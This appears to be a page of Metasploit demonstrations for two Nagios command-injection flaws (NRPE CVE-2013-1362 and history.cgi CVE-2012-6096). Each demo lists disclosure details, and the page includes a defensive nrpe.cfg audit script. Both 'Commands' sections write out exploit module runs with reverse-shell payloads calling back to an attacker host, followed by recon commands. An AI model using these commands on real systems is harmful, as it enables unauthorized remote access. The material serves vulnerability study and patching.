CVE-2013-1362 Nagios Remote Plugin Executor Arbitrary Command Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Rudolph Pereira
Vulnerability patched by vendor on 2012-12-21
Vulnerability publicly disclosed by Rudolph Pereira on 2013-02-21
Metasploit PoC provided on 2013-03-19

PoC provided by :

Rudolph Pereira
jwpari

Reference(s) :

CVE-2013-1362
OSVDB-90582
BID-58142

Affected version(s) :

Nagios Remote Plugin Executor (NRPE) prior to 2.14

Tested on Ubuntu 12.10 x86 with :

Nagios Remote Plugin Executor (NRPE) 2.13

Description :

The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option, dont_blame_nrpe, which enables command-line arguments to be provided to remote plugins. When this option is enabled, it is possible to execute arbitrary commands, even though NRPE makes an effort to sanitize arguments to prevent command execution.
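
A configuration check for the setting described above, as an added example (not code from the original page or from the NRPE project): it parses an nrpe.cfg body and reports whether dont_blame_nrpe is enabled and which command definitions take $ARGn$ macros. The sample configuration is constructed, and include/include_dir directives are not followed.

```python
import re

# Constructed sample nrpe.cfg body (not taken from the page or a real host).
SAMPLE_CFG = """\
# NRPE sample configuration (constructed)
allowed_hosts=127.0.0.1
dont_blame_nrpe=1
command[check_users]=/usr/lib/nagios/plugins/check_users -w 5 -c 10
command[check_disk]=/usr/lib/nagios/plugins/check_disk -w $ARG1$ -c $ARG2$ -p $ARG3$
#command[check_old]=/usr/lib/nagios/plugins/check_old $ARG1$
"""

ARG_MACRO = re.compile(r"\$ARG\d+\$")
COMMAND = re.compile(r"^command\[([^\]]+)\]\s*=\s*(.+)$")


def audit_nrpe_config(text):
    """Return (args_enabled, {command_name: [macros]}) for an nrpe.cfg body."""
    args_enabled = False  # treated as off unless the file turns it on
    arg_commands = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and commented-out directives
        m = COMMAND.match(line)
        if m:
            macros = ARG_MACRO.findall(m.group(2))
            if macros:
                arg_commands[m.group(1)] = macros
            continue
        key, _, value = line.partition("=")
        if key.strip() == "dont_blame_nrpe":
            args_enabled = value.strip() == "1"  # keep the most recent value seen
    return args_enabled, arg_commands


def findings(text):
    """Names of commands that accept remote arguments; empty if arguments are off."""
    enabled, arg_commands = audit_nrpe_config(text)
    return sorted(arg_commands) if enabled else []


if __name__ == "__main__":
    enabled, cmds = audit_nrpe_config(SAMPLE_CFG)
    print("dont_blame_nrpe enabled:", enabled)
    for name in findings(SAMPLE_CFG):
        print("accepts remote arguments:", name, cmds[name])
```

On hosts running NRPE prior to 2.14, any command this reports is a reason to set dont_blame_nrpe=0 or upgrade.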

Commands :

use exploit/linux/misc/nagios_nrpe_arguments
set RHOST 192.168.178.54
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.36
exploit

id
uname -a
ifconfig

CVE-2012-6096 Nagios3 history.cgi Vulnerability Metasploit Demo

Timeline :

Vulnerability reported on Full Disclosure by Aris temp66 on 2012-12-09
PoC provided by blasty on 2013-01-10
Metasploit PoC provided on 2013-01-15

PoC provided by :

Unknown (temp66)
blasty
Jose Selvi
Daniele Martini

Reference(s) :

CVE-2012-6096
OSVDB-88322
BID-56879
Full Disclosure

Affected version(s) :

Nagios 3.4.3 and previous

Tested on Debian 5.0.10 with :

nagios3_3.0.6-4~lenny2_i386.deb

Description :

This module abuses a command injection vulnerability in the Nagios3 history.cgi script. An alert should exist in the history.cgi web page.

Commands :

use exploit/unix/webapp/nagios3_history_cgi
set RHOST 192.168.178.44
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo